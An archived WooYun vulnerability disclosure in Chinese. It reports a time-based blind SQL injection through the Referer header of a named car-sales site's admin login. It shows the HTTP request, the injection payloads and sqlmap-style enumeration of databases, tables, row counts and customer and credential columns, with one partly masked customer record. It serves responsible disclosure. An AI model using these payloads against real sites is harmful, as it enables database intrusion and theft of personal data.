乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-19: 细节已通知厂商并且等待厂商处理中 2015-01-19: 厂商已经确认,细节仅向厂商公开 2015-01-29: 细节向核心白帽子及相关领域专家公开 2015-02-08: 细节向普通白帽子公开 2015-02-18: 细节向实习白帽子公开 2015-03-05: 细节向公众公开
233备注:*的部分都是代替了某些真实数据,一个*有时候不是只代替一个数字。
我有来了!!!花了好长时间才发现这个注入点、登陆地址:http://sales.xcar.com.cn/admin/login.php登陆的时候有个Referer参数GET /admin/ HTTP/1.1Referer: * ------------这里User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36X-Requested-With: XMLHttpRequestCookie: PHPSESSID=72e891a73d852c734bb02f1678aa5e64; urllog_mkey=1421512336.53Host: sales.xcar.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
因为是老熟人了,知道爱卡不喜欢别人把数据库贴出来。所以漏洞证明就贴那么多了。只证明下漏洞真实性。
---Parameter: Referer (Referer) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/'||(SELECT 'kWPQ' FROM DUAL WHERE 6984=6984 AND SLEEP(5))||'Parameter: Referer #1* ((custom) HEADER) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: if(now()=sysdate(),sleep(0),0)/'||(SELECT 'FNqk' FROM DUAL WHERE 5202=5202 AND SLEEP(5))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/---back-end DBMS: MySQL 5.0.11available databases [3]:[*] information_schema[*] sal*[*] testDatabase: sal*[99 tables] 99张表下来就来看看表中有多少信息、惊喜来了。(可以看到订单信息(name,tel,address),会员信息,价格信息等等)select count(*) from vi*: '54099' select count(*) from or*: '15420'select count(*) from order*car: '15269971' 这是一千五百多万么?select count(*) from vip*order: '6425'vi*表中字段:| id | fuid | caid | cityid | sale_uid | tel | telc | telb | mapy | name | is4s | sdate | isdel | ischk | edatq | ytype | namepy | coname | vippass | coaname | address | vipuser | link_name | premission | contractnum |有name,tel,vipuser,vippass,address这够么?看了前几条数据,举例:用户gocarpric**,密码弱口令,其他密码123456的有112233的,还有aaa*的,(这里提下)再看一个表:Table: ord*[15420 entries]+----+-----------+--------+---------+-----------+------------------+--------------+-------------------+--------+----------+--------------+-------------------+----------+-------+--------+------------------------+---------------------------------+---------------+---------------------------+--------------------------------------+----------------------------+-----------------+-----------------------------------------------------------+| id | jid | xcarid | cityid | mid_add | mid_edit | qq | tel | sex | tag | note | tel2 | name | paytp | issend | dt_add | dt_edit | whenbuy | looked_vipt | sale_otqer_now | sale_prkce_now | scly_otheu_wait | sple_qricu_wcit( |+----+-----------+--------+---------+-----------+------------------+--------------+-------------------+--------+----------+--------------+-------------------+----------+-------+--------+------------------------+---------------------------------+---------------+---------------------------+--------------------------------------+----------------------------+-----------------+-----------------------------------------------------------+| * | 10000000C | 0AC | 198 | 2 | 2 | 183***06 | 486***17*708 | 0 | 02 | ir | 3865*707* | 咛炜华 | 0 | 0 | 2013-07/01 19:23:A2 | 2013-07-01 29:23:02 | Ut | <blank> | * | *t | <blank> | <blank> |到此为止!!!
1,首先得修复问题2,记得你们问我要过联系方式,不过一直没礼物。3,不求礼物,只求20rank!!!
危害等级:高
漏洞Rank:20
确认时间:2015-01-19 16:46
感谢@路人甲大侠的帮助,我们会尽快修复!要过联系方式肯定会发小礼物的,白帽子的帮助不会忘记!
暂无